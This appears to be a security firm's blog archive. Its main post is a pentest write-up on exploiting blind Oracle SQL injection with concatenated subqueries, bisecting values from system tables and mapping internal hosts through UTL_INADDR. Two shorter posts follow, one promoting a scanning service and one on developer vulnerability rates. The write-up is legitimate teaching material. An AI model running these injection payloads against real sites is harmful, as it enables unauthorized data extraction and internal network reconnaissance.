Tag Archives: vulnerability

In Your Oracle: Part Two

In Micheal‘s previous post, ‘In Your Oracle: The Beginning‘, he introduced a blind SQL Injection vulnerability that a client was asking us to dig deeper into. The client wanted us to do this, because while they recognized that the vulnerability was real, actionable, and a threat – especially to their users – they weren’t convinced of its severity. Instead, the client claimed that the vulnerability could only be leveraged to read data already intended to be accessible by the logged-in user. In other words, the SQL query was executing within the context of a low-privileged database user.

A quick aside: I had a different client who recently downplayed the severity of an SQL Injection vulnerability because the result set was being parsed and formatted before being incorporated into the response. Because of this behavior, they didn’t think any data could be accessed other than what was intended to be parsed and formatted into the page. Aside from being able to UNION other data into the result set, or simply to brute force dropping tables, I introduced the client to something Micheal touched on in his post: The true/false/error condition. More on this in a minute.


The Vulnerability

The vulnerability that Micheal and I were digging into did not involve the entire result set being output to the page, so we couldn’t simply UNION other data and get it all dumped back to us. That’s because the application would execute an SQL query – using an ID that was being supplied in the query string – and the first row of data returned by the query would be used to determine the response. Therefore, we could only return a limited amount of data at a time, and that data would have to conform to certain data types – otherwise, the page would error out.

Here’s an example of what the back-end SQL query may have looked like (though, in reality, it was much more complex than this):

SELECT * FROM listingsData WHERE id='504'

And an example of the URL we were injecting on:

http://example.com/somepage?id=504

And last, but not least, an extraordinarily simplified example of the output from the page:

Listing ID: 504
Listing Entity: Acme, Inc.
Listing Data: <a table of data>


The True/False/Error Condition

When an SQL Injection vulnerability can’t be leveraged to just dump rows upon rows of data, a true/false condition can allow an attacker to fuzz the database, and determine the table and column names, the cell values, and more. Basically, with a reliable true/false condition, an attacker can brute force the entire database in a practical amount of time.

However, due to strange behavior from the application (plus what we suspected was a complex query syntax that we couldn’t discern), we were not able to simply append our own WHERE clause condition, like this:

http://example.com/somepage?id=504'%20AND%201=1%20AND%20''='

We were, however, able to perform string concatenation. Injecting id=5'||'0'||'4 would give us the same response as id=504. We also discovered that id=54 would result in the following response:

Listing ID:
Listing Entity:
Listing Data:

Furthermore, we found that a syntax error, such as what id=' would cause, produced the following response:

An error has occurred. Please try again.

In Oracle, there exists a dummy table called ‘dual‘. We were able to use this table, in combination with string concatenation and a sub-query, to establish a boolean condition:

http://example.com/somepage?id=5'||(SELECT%200%20FROM%20dual%20WHERE%201=1)||'4

The URL encoding makes it look messy. Here’s the URL-decoded version of our injection:

5'||(SELECT 0 FROM dual WHERE 1=1)||'4

Because the WHERE clause of our sub-query evaluated to TRUE, the SELECT would return a zero, which got concatenated with the 5 and 4, and became 504. This injection resulted in Acme, Inc.’s information being returned in the page, and became our TRUE condition.

Now consider this injection (URL decoded for readability):

5'||(SELECT 0 FROM dual WHERE 1=0)||'4

Because the WHERE clause evaluated to FALSE, the SELECT returned nothing, which got concatenated with 5 and 4, and became 54. This injection resulted in blank listing data in the response, and was considered to be our FALSE condition.

The TRUE condition let us know when the WHERE clause of our sub-query evaluated to TRUE, and the FALSE condition told us the inverse. The error condition (described a few paragraphs above) let us know if there was a syntax error in our query (possibly due to characters being unexpectedly encoded).

Now that we had established a reliable true/false/error condition, we could start having some fun.


The Good Stuff

We were able to use the true/false condition to brute force some pieces of information that we figured the client did not intend logged-in users to obtain, such as the database name (from this point forward, all injections will remain URL-decoded for the sake of readability):

5'||(SELECT 0 FROM dual WHERE SUBSTR(SYS.DATABASE_NAME, 1, 1) BETWEEN 'a' AND 'z')||'4

The above injection took the first character of the database and determined if it was a lowercase letter. If true, we’d get Acme, Inc.’s data in the response; if false, we’d get blank listing data.

We could quickly brute force each character by cutting our BETWEEN range in half for each test. For example, if the above injection resulted in a TRUE condition, then we could figure out which lowercase letter the database name started with by using the following process:

Cut the range of characters in half:

5'||(SELECT 0 FROM dual WHERE SUBSTR(SYS.DATABASE_NAME, 1, 1) BETWEEN 'a' AND 'm')||'4

If the above resulted in a TRUE condition, then we knew the letter was between ‘a’ and ‘m’, and could then test for it being between ‘a’ and ‘g’. If the above resulted in a FALSE condition, then we’d drill down into the ‘m’ through ‘z’ range. In either case, we kept narrowing the search range until we were able to pinpoint the correct character.

We could then brute force the rest of the database name characters by incrementing the second parameter of the SUBSTR function (2 for the second character, 3 for the third, etc). If we incremented the parameter and got an error condition as a result, we knew we had surpassed the length of the database name.

We could also pre-determine the length of the database name with a similar “test and drill down” technique with this injection:

5'||(SELECT 0 FROM dual WHERE LENGTH(SYS.DATABASE_NAME)>10)||'4

Once we had brute forced the entire value, we verified our finding with this injection:

5'||(SELECT 0 FROM dual WHERE SYS.DATABASE_NAME='dbmaster01')||'4

We were able to extract information from other tables, too, such as:

5'||(SELECT 0 FROM SYS.USER_USERS WHERE SUBSTR(username, 1, 1) BETWEEN 'a' AND 'z')||'4

Using this method, we were able to extract various pieces of information, such as the database name, database user (which the query was being executed with), database user ID, and default table space. However, Micheal and I were not happy stopping there. With the help of pentestmonkey.net, we discovered some interesting Oracle features that gave us some juicy insights into our client’s network.


The Juicy Stuff

Oracle has a couple of variables that allowed us to extract the server’s internal hostname and IP address: UTL_INADDR.get_host_name and UTL_INADDR.get_host_address, respectively. Using the same brute force technique described above, we were able to successfully extract the hostname/IP and verify our findings with the following injections:

5'||(SELECT 0 FROM dual WHERE UTL_INADDR.get_host_name='srvdb01')||'4
5'||(SELECT 0 FROM dual WHERE UTL_INADDR.get_host_address='10.1.20.5')||'4

What we found even more interesting was the fact that UTL_INADDR.get_host_name would accept a parameter – an IP – and would allow us to basically perform DNS queries through the SQL Injection vulnerability:

5'||(SELECT 0 FROM dual WHERE LENGTH(UTL_INADDR.get_host_name('10.1.20.6'))>0)||'4

If the above resulted in a TRUE condition, we knew the IP resolved successfully, and we could proceed with brute forcing the hostname. If the result was a FALSE condition, we’d presume the IP to be invalid.

Micheal and I, being the PHP fans that we are, collaborated with each other to automate the entire process. Several hundred lines of code later, we were able to quickly harvest dozens of internal IPs and corresponding hostnames – information that would come in quite handy for a network-level attack, or even for a social engineering approach (“Hi, I’m Matt from IT. I’m having trouble logging in to srvdb01 at IP 10.1.20.5. Is the root password still “qSSQ[W2&(8#-/IQ4b{W;%us”?).


Conclusion & Take-Aways

Never assume that you know the full extent of the threat that a vulnerability represents to your organization. While you can reach a particular level of confidence in your knowledge and understanding of the situation, you never know what new and imaginative avenues of attack or combinations of techniques an attacker may discover or create – like mapping out your internal network through an SQL Injection vulnerability.

Imagination is more important than knowledge. For knowledge is limited to all we now know and understand, while imagination embraces the entire world, and all there ever will be to know and understand.” -Albert Einstein

Our Process — How We Do What We Do and Why

A while back I published what became an extremely popular post, looking behind the scenes at WhiteHat Sentinel’s backend infrastructure. On display were massive database storage clusters, high-end virtualization chassis, super fast ethernet backplanes, fat pipes to the internet, near complete system redundancy, round-the-clock physical security, and so on. Seriously cool stuff that, at the time, was to support the 2,000 websites under WhiteHat Sentinel subscription where we performed weekly vulnerability assessments.

Today, only seven months later, that number has nearly doubled to 4,000. A level of success we’re very proud of. I guess we’re doing something right, because no one else, consultancy or SaaS provider, comes anywhere close. This is not said to brag or show off, but to underscore that scalability is a critical part of solving one of the many Web security challenges many companies face, and an area we focus on daily at WhiteHat.

To meet the demand we scaled up basically everything. Sentinel now peaks at over 800 concurrent scans, sends roughly 300 million HTTP requests per month, a subset of which are 3.85 million security checks sent each week, resulting in around 185 thousand potential vulnerabilities that our Threat Research Center (TRC) processes each day (Verified, False-Positives, and Duplicates), and collectively generate 6TBs of data per week. This system of epic proportions has taken millions in R&D and years of effort by many of the top minds in Web security to build.


Clearly Sentinel is not some off-the-shelf, toy, commercial desktop scanner. Nor is it a consultant body shop hiding behind a curtain. Sentinel is a true enterprise class vulnerability assessment platform, leveraging a vast knowledge-base of Web security intelligence.

This is important because a large number of corporations have hundreds, even thousands of websites each, that all need to be protected. Being able to achieve the aforementioned figures, without sacrificing assessment quality, requires not only seriously advanced automation technology, but development of a completely new process of performing website vulnerability assessments. As a security pro and vendor who values transparency, this process, our secret sauce, something radically different than anything else out there, deserves to be better explained.

As a basis for comparison, the typical one-off consultant assessment/pen-test is conducted by a single person using an ad hoc methodology, with one vulnerability scan, and one website at a time. Generally, high-end consultants are be capable of thoroughly assessing roughly twenty websites in a year, each a single time. An annual ratio of 20:1 (assessment to people).

To start off, our highly acclaimed and fast growing Threat Research Center is the department responsible for service delivery. At over 40 people strong, the entire team is located at WhiteHat headquarters in Santa Clara, California. All daily TRC workload is coordinated via a special software-based workflow management system, named “Console,” we purpose-built to shuttle millions of discreet tasks across hundreds/thousands of websites that need to be completed.

Work units include initial scan set-ups, configuring the ideal assessment schedule, URL rule creation, form training, security check customization, business logic flaw testing, vulnerability verification, findings review meetings, customer support, etc. Each of these work units is able to be handled by any available TRC expert, or team of experts, who specialize and are proficient in a specific area of Web security, that might take place during different stages of the assessment process. Once everything is finished, every follow-on assessment becomes automated.

That is the real paradigm buster, a technology-driven website vulnerability assessment process capable of overcoming the arcane one-person-one-assessment-at-a-time model that stifles scalability. It’s as if the efficiency of Henry Ford’s assembly line met the speed of a NASCAR pit crew — this model dramatically decreases man hours necessary per assessment, leverages the available skills of the TRC, and delivers consistently over time. No other technology can do this.

As a long time Web security pro, to see such a symphony of innovation come together is really a sight to behold. And if there is any question about quality, we expect Sentinel PE testing coverage to meet or exceed that of any consultancy anywhere in the world. That is, no vulnerability that exposes the website or users to a real risk of compromise should be missed.

Let’s get down to brass tacks. If all tasks were to be combined, a single member of TRC could effectively perform ongoing vulnerability assessments on 100 websites a year. At 100:1, Sentinel PE is 5x more efficient than the traditional consulting model. Certainly impressive, but this is an apples to oranges comparison. The “100” in the 100:1 ratio is websites NOT assessments like the earlier cited 20:1 consultant ratio. The vast majority of Sentinel customer websites receive weekly assessments, not annual one-time one-offs. So the more accurate calculation would equal 5200:1 (52 weeks). Sentinel also comes in varied flavors of coverage. SE and BE measure in at 220:1 and 400:1 websites to TRC members respectively.

The customer experience perspective

Whenever a new customer website is added to WhiteHat Sentinel, a series of assessment tasks are generated by the system and automatically delegated via a proprietary backend workflow management system — “Console.” Each task is picked up and completed by either a scanner technology component or a member of our Threat Research Center (TRC) — our team of Web security experts responsible for all service delivery.

Scanner tasks include logging-in to acquire session cookies, site crawling, locating forms that need valid data, customizing attack injections, vulnerability identification, etc. Tasks requiring some amount of hands-on work are scan tuning, vulnerability verification, custom test creation, filling out forms with valid data, business logic testing, etc. After every task has been completed and instrumented into Sentinel, a comprehensive assessment can be performed each week in a fully automated fashion, or by whatever frequency the customer preferrers. No additional manual labor is necessary unless a particular website change flags someone in the TRC.

This entire collection of tasks, all of which must be completed when a new website is added to Sentinel, is a process we call “on-boarding.” From start to finish, the full upfront on-boarding process normally takes between 1 – 3 weeks and 2 – 3 scans.

From there, there are people in the TRC purely dedicated to monitoring nearly hundreds of running scans and troubleshooting anything that looks out of place on an ongoing basis. Another team is tasked to simply verify hundreds of thousands of potential scanner flagged vulnerabilities each week such as Cross-Site Scripting, SQL Injection, Information Leakage, and dozens of others. Verified results, also known as false-positive removal, is one of the things our customers say they like best about Sentinel because it means many thousands of findings they didn’t have to waste their time on.

Yet another team’s job is to configure forms with valid data, and marking which are safe for testing. All this diversification of labor frees up time for those who are proficient in business logic flaw testing, allowing them to focus on issues such as Insufficient Authentication, Insufficient Authorization, Abuse of Functionality, and so on. Contrast everything you’ve read so far with a consultant engagement that amounts to a Word or PDF report.

At this point you may be wondering if website size and client-side technology complexity cause us any headaches. The answer is not so much anymore. Over the last seven years we’ve seen and had to adapt to just about every crazy, confusing, and just plain silly website technology implementation the Web has to offer — of which there are painfully many. Then of course we’ve had to add support for Flash, Ajax, Silverlight, JavaScript, Applets, Active X, (broken) HTML(5), CAPTCHAs, etc.

The three most important points here are:

1) Sentinel has been successfully deployed on about 99% of websites we’ve seen. 2) Multi-million page sites are handled regularly without much fanfare. 3) Most boutique consultancies assess maybe a few dozen websites each year. We call this Monday through Friday.

Any questions?

Are 20% of Developers Responsible for 80% of the Vulnerabilities?

That’s the question I recently posed in a twitter exchange with @securityninja and @manicode. For those unfamiliar with the Pareto principle, also known as the 80/20 rule, is where roughly 80% of the effects come from 20% of the causes. This Pareto principle phenomenon can be seen in economics, agriculture, land ownership, and so on. I think it may also apply to developers and software security — particularly software vulnerabilities.

Personal experience would have most of us agreeing that not all developers are equally productive. We’ve all seen where a few developers generate way more useful code in a given amount of time than others. If this be the case, then it may stand to reason that the opposite could be true — where a few developers are responsible for a bulk of the shoddy vulnerable code. Think about it, when vulnerabilities are introduced, are they fairly evenly attributable across the developer population or clumped together within a smaller group?

The answer, backed up by data, would have a profound affect on general software security guidance. It would to more efficiently allocate security resources in developer training, standardized framework controls, software testing, personnel retention, etc. Unfortunately very few people in the industry might have the data to answer this question authoritatively, and then only from within their own organization. Off the top of my head I can only think that Adobe, Google, or Microsoft might have such data handy, but they’ve never published or discussed it.

In the meantime I think we’d all benefit from hearing some personal anecdotes. From your experience, are 20% of developers responsible for 80% of the vulnerabilities?